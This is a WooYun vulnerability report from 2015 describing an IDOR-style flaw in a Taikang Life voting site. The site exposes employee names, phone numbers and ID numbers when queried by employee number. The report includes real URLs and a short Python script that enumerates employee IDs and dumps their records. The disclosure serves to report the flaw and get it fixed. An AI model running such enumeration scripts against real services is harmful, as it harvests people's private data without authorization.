当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124597

漏洞标题:泰康人寿某站点设计不当可导致内部员工信息泄漏

相关厂商:taikang.com

漏洞作者: 浮萍

提交时间:2015-07-05 10:22

修复时间:2015-08-20 17:02

公开时间:2015-08-20 17:02

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

泄漏员工的 姓名 工作单位 手机 身份证号等信息

详细说明:

从某社交平台看到关于泰康的一个业务员投票系统
意外发现泄漏员工信息

http://mss.95522.cn/vote/vote/?param=6e20ccf582c0145f71362141037cfb4e&openId=opKa3jlaQnSyVRN4LgdjDZ_jEU4Y&randomNum=487336
http://mss.95522.cn/vote/vote/?param=b17215b9a8f3add82f2a2a27772bc6eb&openId=opKa3jqdKN6IsSDeG23E_t5PeIkc&randomNum=931840
http://mss.95522.cn/vote/vote/?param=2e0aa04b56e5dcfdc4bc751ab7570b3a&openId=opKa3jifz0o9GvxHU5c7a3KRkRoQ&randomNum=089853


某位员工的投票地址
通过抓包发现
当点击链接时发现一系列的post和get

选区_001.png


其中有个post返回的是员工的 详细信息

选区_002.png


请求地址http://mss.95522.cn/vote/agentInfo/
请求内容{"mssId":"C09808312"}
其中mssid为员工工号

漏洞证明:

然后用脚本遍历一下吧

import urllib
import urllib2
import json
import sys
reload(sys)

def http_post(mssid):
url='http://mss.95522.cn/vote/agentInfo/'
#values ={'mssId':'D11931298'}
#values ={'mssId':'C09808312'}
values ={'mssId':mssid}
jdata = json.dumps(values)
req = urllib2.Request(url, jdata)
req.add_header('Content-Type', 'application/json; charset=utf-8')
response = urllib2.urlopen(req)
return response.read()
for i in range(9808250,9808350):
sys.setdefaultencoding('utf-8')
resp = http_post('C0'+str(i))
print resp


遍历了一下工号从C09808250到C09808350

选区_003.png


可获取99个人员信息
另两个URL 也可以获取到员工工号
然后通过员工工号去获取员工的信息

选区_005.png


另外一个就不再取了
http://mss.95522.cn/weblogon/companyid/
可以看到公司代码

选区_004.png


修复方案:

打码 或者不显示员工信息

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-07-06 17:01

厂商回复:

非常感谢发现并提交给我们,已安排相关人员处理!

最新状态:

暂无